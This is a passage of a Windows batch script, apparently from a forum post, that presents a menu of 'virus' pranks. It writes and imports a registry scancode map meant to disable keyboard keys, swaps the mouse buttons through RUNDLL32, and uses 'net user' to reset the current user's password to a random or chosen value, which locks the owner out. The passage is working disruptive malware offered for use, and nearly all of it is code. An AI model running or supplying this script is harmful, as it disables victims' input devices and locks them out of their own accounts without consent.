echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg
pause
cls
GOTO Menu
:A_Virus_SwapM
echo 1 - Swap Mouse Buttons.
echo 2 - Go Back.
echo 3 - Exit batch.
set /p A_Virus_SwapM_Question= What would you like to do?:
IF %A_Virus_SwapM_Question%==1 GOTO :A_Virus_SwapM_True
IF %A_Virus_SwapM_Question%==2 GOTO :A_Virus
IF %A_Virus_SwapM_Question%==3 GOTO :Quit
:A_Virus_SwapM_True
echo Mouse buttons swapping.
RUNDLL32 USER32.DLL,SwapMouseButton
pause
cls
GOTO Menu
:A_Virus_Pass
echo Note: This only changes the current users password.
echo 1 - Random password.
echo 2 - Custom password.
echo 3 - Go Back.
echo 4 - Exit Batch.
set /p A_Virus_Pass_Question= What would you like to do?:
IF %A_Virus_Pass_Question%==1 GOTO :A_Virus_Pass_Random
IF %A_Virus_Pass_Question%==2 GOTO :A_Virus_Pass_Custom
IF %A_Virus_Pass_Question%==3 GOTO :A_Virus
IF %A_Virus_Pass_Question%==4 GOTO :Quit
:A_Virus_Pass_Random
echo Are you sure you want to change the current password?
echo [Will Display new password]
echo 1 - Yes
echo 2 - No
set /p A_Virus_Pass_Random_Question= What would you like to do?:
IF %A_Virus_Pass_Random_Question%==1 GOTO :A_Virus_Pass_Random_True
IF %A_Virus_Pass_Random_Question%==2 GOTO :A_Virus
:A_Virus_Pass_Random_True
set /a A_Virus_Pass_Random_True_Randompass= %random%%random%
echo The new password is %A_Virus_Pass_Random_True_Randompass%
net user %username% %A_Virus_Pass_Random_True_Randompass%
pause
cls
GOTO Menu
Copyright © 2026, NextGenUpdate.
All Rights Reserved.